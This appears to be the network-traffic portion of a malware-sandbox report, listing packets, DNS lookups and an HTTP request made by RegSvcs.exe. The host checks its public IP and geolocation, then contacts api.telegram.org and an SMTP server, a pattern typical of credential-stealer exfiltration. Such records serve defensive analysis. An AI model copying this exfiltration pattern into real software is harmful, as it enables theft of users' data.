Jul 31, 2024 09:00:32.315922976 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:32.321892023 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:32.522100925 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:32.525108099 CEST | 49704 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.525156975 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.525239944 CEST | 49704 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.525501013 CEST | 49704 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.525532007 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.568020105 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:32.993468046 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:32.996112108 CEST | 49704 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:32.996170998 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:33.118097067 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:33.118204117 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:33.118271112 CEST | 49704 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:33.118696928 CEST | 49704 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:33.122029066 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:33.123882055 CEST | 49705 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:33.127374887 CEST | 80 | 49702 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:33.127466917 CEST | 49702 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:33.128797054 CEST | 80 | 49705 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:33.128886938 CEST | 49705 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:33.129033089 CEST | 49705 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:33.133884907 CEST | 80 | 49705 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:33.814076900 CEST | 80 | 49705 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:33.815711975 CEST | 49706 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:33.815764904 CEST | 443 | 49706 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:33.816304922 CEST | 49706 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:33.816304922 CEST | 49706 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:33.816344023 CEST | 443 | 49706 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:33.864965916 CEST | 49705 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:34.301000118 CEST | 443 | 49706 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:34.305592060 CEST | 49706 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:34.305625916 CEST | 443 | 49706 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:34.439584970 CEST | 443 | 49706 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:34.439857960 CEST | 443 | 49706 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:34.439943075 CEST | 49706 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:34.440573931 CEST | 49706 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:34.446013927 CEST | 49707 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:34.452114105 CEST | 80 | 49707 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:34.452235937 CEST | 49707 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:34.452337980 CEST | 49707 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:34.457866907 CEST | 80 | 49707 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:35.121427059 CEST | 80 | 49707 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:35.123070955 CEST | 49708 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:35.123116016 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:35.123202085 CEST | 49708 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:35.123516083 CEST | 49708 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:35.123532057 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:35.161904097 CEST | 49707 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:35.588582993 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:35.590956926 CEST | 49708 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:35.590976000 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:35.724980116 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:35.725063086 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:35.725159883 CEST | 49708 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:35.725733042 CEST | 49708 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:35.729288101 CEST | 49707 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:35.730510950 CEST | 49709 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:35.737411022 CEST | 80 | 49707 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:35.737555027 CEST | 49707 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:35.738121033 CEST | 80 | 49709 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:35.738200903 CEST | 49709 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:35.738308907 CEST | 49709 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:35.745651007 CEST | 80 | 49709 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:36.434078932 CEST | 80 | 49709 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:36.435847044 CEST | 49710 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:36.435933113 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:36.436008930 CEST | 49710 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:36.436388016 CEST | 49710 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:36.436424971 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:36.489892960 CEST | 49709 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:36.914694071 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:36.916866064 CEST | 49710 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:36.916934013 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:37.057136059 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:37.057432890 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:37.057503939 CEST | 49710 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:37.057852983 CEST | 49710 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:37.061625004 CEST | 49709 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:37.062505007 CEST | 49711 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:37.066905022 CEST | 80 | 49709 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:37.067040920 CEST | 49709 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:37.067358017 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:37.067540884 CEST | 49711 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:37.067643881 CEST | 49711 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:37.072550058 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:38.744698048 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:38.745944977 CEST | 49712 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:38.745976925 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:38.746047020 CEST | 49712 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:38.746558905 CEST | 49712 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:38.746576071 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:38.786808014 CEST | 49711 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:39.205745935 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:39.207870960 CEST | 49712 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:39.207905054 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:40.378144979 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:40.378329039 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:40.378387928 CEST | 49712 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:40.379159927 CEST | 49712 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:40.384372950 CEST | 49711 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:40.386030912 CEST | 49713 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:40.392117023 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:40.392182112 CEST | 49711 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:40.394356966 CEST | 80 | 49713 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:40.394531965 CEST | 49713 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:40.394596100 CEST | 49713 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:40.403728008 CEST | 80 | 49713 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:42.133896112 CEST | 80 | 49713 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:42.135545969 CEST | 49714 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:42.135582924 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:42.135756969 CEST | 49714 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:42.135960102 CEST | 49714 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:42.135974884 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:42.177640915 CEST | 49713 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:42.603672028 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:42.606023073 CEST | 49714 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:42.606070042 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:42.749293089 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:42.749577045 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:42.749674082 CEST | 49714 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:42.749977112 CEST | 49714 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:42.753273010 CEST | 49713 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:42.754463911 CEST | 49715 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:42.763968945 CEST | 80 | 49713 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:42.764075994 CEST | 49713 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:42.764219999 CEST | 80 | 49715 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:42.764302969 CEST | 49715 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:42.764475107 CEST | 49715 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:42.773967028 CEST | 80 | 49715 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:43.436903000 CEST | 80 | 49715 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:43.439059973 CEST | 49716 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:43.439104080 CEST | 443 | 49716 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:43.439196110 CEST | 49716 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:43.439568043 CEST | 49716 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:43.439584017 CEST | 443 | 49716 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:43.489926100 CEST | 49715 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:43.896970987 CEST | 443 | 49716 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:43.898781061 CEST | 49716 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:43.898817062 CEST | 443 | 49716 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:44.027941942 CEST | 443 | 49716 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:44.028196096 CEST | 443 | 49716 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:44.028249025 CEST | 49716 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:44.028686047 CEST | 49716 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:44.032394886 CEST | 49715 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:44.033179045 CEST | 49717 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:44.039150000 CEST | 80 | 49715 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:44.039189100 CEST | 80 | 49717 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:44.039206982 CEST | 49715 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:44.039247036 CEST | 49717 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:44.039377928 CEST | 49717 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:44.044274092 CEST | 80 | 49717 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:44.709991932 CEST | 80 | 49717 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:44.711615086 CEST | 49719 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:44.711663008 CEST | 443 | 49719 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:44.711738110 CEST | 49719 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:44.712109089 CEST | 49719 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:44.712135077 CEST | 443 | 49719 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:44.755570889 CEST | 49717 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:45.207776070 CEST | 443 | 49719 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:45.209806919 CEST | 49719 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:45.209841967 CEST | 443 | 49719 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:45.364078999 CEST | 443 | 49719 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:45.364186049 CEST | 443 | 49719 | 188.114.96.3 | 192.168.2.7
Jul 31, 2024 09:00:45.364270926 CEST | 49719 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:45.364834070 CEST | 49719 | 443 | 192.168.2.7 | 188.114.96.3
Jul 31, 2024 09:00:45.379599094 CEST | 49717 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:45.385380983 CEST | 80 | 49717 | 132.226.247.73 | 192.168.2.7
Jul 31, 2024 09:00:45.385443926 CEST | 49717 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:45.393685102 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:45.393745899 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:45.393829107 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:45.394294977 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:45.394313097 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.030527115 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.030654907 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:46.066648006 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:46.066672087 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.067656994 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.079087019 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:46.124514103 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.262679100 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.262782097 CEST | 443 | 49721 | 149.154.167.220 | 192.168.2.7
Jul 31, 2024 09:00:46.262978077 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:46.267723083 CEST | 49721 | 443 | 192.168.2.7 | 149.154.167.220
Jul 31, 2024 09:00:52.470566034 CEST | 49705 | 80 | 192.168.2.7 | 132.226.247.73
Jul 31, 2024 09:00:53.023221016 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:53.028273106 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:53.028367996 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:53.700608015 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:53.700831890 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:53.705991030 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:53.857491970 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:53.857744932 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:53.862761021 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.015309095 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.015935898 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.021188021 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.185144901 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.185158014 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.185168028 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.185295105 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.213756084 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.218812943 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.368777037 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.373625994 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.378540039 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.528350115 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.529638052 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.534689903 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.698832035 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.699336052 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.704212904 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.867598057 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:54.867904902 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
Jul 31, 2024 09:00:54.872759104 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:55.022422075 CEST | 587 | 49725 | 208.91.199.115 | 192.168.2.7
Jul 31, 2024 09:00:55.022749901 CEST | 49725 | 587 | 192.168.2.7 | 208.91.199.115
                                      Jul 31, 2024 09:00:55.027693033 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.216949940 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.217334986 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.222239017 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.371550083 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.372279882 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.372369051 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.372369051 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.372369051 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:00:55.377207994 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.377458096 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.589685917 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:00:55.630624056 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:02:32.662328959 CEST49725587192.168.2.7208.91.199.115
                                      Jul 31, 2024 09:02:32.667176008 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:02:32.821460962 CEST58749725208.91.199.115192.168.2.7
                                      Jul 31, 2024 09:02:32.822019100 CEST49725587192.168.2.7208.91.199.115
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 31, 2024 09:00:29.324629068 CEST | 63640 | 53 | 192.168.2.7 | 1.1.1.1
Jul 31, 2024 09:00:29.332420111 CEST | 53 | 63640 | 1.1.1.1 | 192.168.2.7
Jul 31, 2024 09:00:31.636756897 CEST | 56433 | 53 | 192.168.2.7 | 1.1.1.1
Jul 31, 2024 09:00:31.644354105 CEST | 53 | 56433 | 1.1.1.1 | 192.168.2.7
Jul 31, 2024 09:00:45.380357027 CEST | 64967 | 53 | 192.168.2.7 | 1.1.1.1
Jul 31, 2024 09:00:45.392929077 CEST | 53 | 64967 | 1.1.1.1 | 192.168.2.7
Jul 31, 2024 09:00:52.640337944 CEST | 50671 | 53 | 192.168.2.7 | 1.1.1.1
Jul 31, 2024 09:00:53.022254944 CEST | 53 | 50671 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 31, 2024 09:00:29.324629068 CEST | 192.168.2.7 | 1.1.1.1 | 0xfd6e | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:31.636756897 CEST | 192.168.2.7 | 1.1.1.1 | 0x4857 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:45.380357027 CEST | 192.168.2.7 | 1.1.1.1 | 0xbf1f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:52.640337944 CEST | 192.168.2.7 | 1.1.1.1 | 0x80af | Standard query (0) | mail.tradolgt.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 31, 2024 09:00:29.332420111 CEST | 1.1.1.1 | 192.168.2.7 | 0xfd6e | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 31, 2024 09:00:29.332420111 CEST | 1.1.1.1 | 192.168.2.7 | 0xfd6e | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:29.332420111 CEST | 1.1.1.1 | 192.168.2.7 | 0xfd6e | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:29.332420111 CEST | 1.1.1.1 | 192.168.2.7 | 0xfd6e | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:29.332420111 CEST | 1.1.1.1 | 192.168.2.7 | 0xfd6e | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:29.332420111 CEST | 1.1.1.1 | 192.168.2.7 | 0xfd6e | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:31.644354105 CEST | 1.1.1.1 | 192.168.2.7 | 0x4857 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:31.644354105 CEST | 1.1.1.1 | 192.168.2.7 | 0x4857 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:45.392929077 CEST | 1.1.1.1 | 192.168.2.7 | 0xbf1f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jul 31, 2024 09:00:53.022254944 CEST | 1.1.1.1 | 192.168.2.7 | 0x80af | No error (0) | mail.tradolgt.com | | 208.91.199.115 | A (IP address) | IN (0x0001) | false
                                      • reallyfreegeoip.org
                                      • api.telegram.org
                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:29.344671011 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:30.024816990 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:29 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c67a5f3b0bcf1fd104caaa12147eb3e3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 31, 2024 09:00:30.030251980 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 31, 2024 09:00:31.588428020 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:31 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
